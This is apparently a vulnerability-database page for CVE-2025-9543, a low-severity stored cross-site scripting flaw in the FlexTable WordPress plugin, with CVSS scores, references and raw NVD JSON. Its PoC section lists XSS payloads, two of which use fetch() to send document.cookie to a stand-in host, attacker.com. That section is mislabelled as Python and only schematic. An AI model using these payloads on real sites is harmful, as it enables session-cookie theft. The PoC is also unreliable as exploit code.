CVE-2025-9543

Description

The FlexTable WordPress plugin before 3.19.2 does not sanitise and escape the imported links from Google Sheet cells, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FlexTable WordPress插件 < 3.19.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-9543 PoC - FlexTable WordPress Plugin Stored XSS
// This PoC demonstrates how an attacker can inject malicious scripts via Google Sheet import

// Step 1: Prepare malicious Google Sheet with XSS payload in link cells
const maliciousSheetData = [
    ['Product', 'Price', 'Link'],
    ['Item1', '$100', '<a href="javascript:alert(document.domain)">View Details</a>'],
    ['Item2', '$200', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>>'],
    ['Item3', '$300', '<svg onload=fetch("https://attacker.com/log?d="+btoa(document.cookie))>']
];

// Step 2: Configure FlexTable to import from the malicious Google Sheet
const flexTableConfig = {
    plugin: 'FlexTable',
    version: '3.19.1',  // Vulnerable version
    importSource: 'google_sheet',
    sheetId: 'MALICIOUS_SHEET_ID',
    autoUpdate: true
};

// Step 3: XSS payload triggers when page renders the table
// The injected JavaScript executes in victim browser context

// Example attack URL pattern:
// Admin accesses: /wp-admin/admin.php?page=flex-table&action=import
// Or any page displaying the imported table content

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9543
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9543
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9543/
[4] VulDB https://vuldb.com/cve/CVE-2025-9543
[5] https://wpscan.com/vulnerability/6cc212f4-aa61-409a-b257-9c920956a401/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9543", "sourceIdentifier": "[email protected]", "published": "2026-01-05T06:16:04.017", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FlexTable WordPress plugin before 3.19.2 does not sanitise and escape the imported links from Google Sheet cells, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/6cc212f4-aa61-409a-b257-9c920956a401/", "source": "[email protected]"}]}}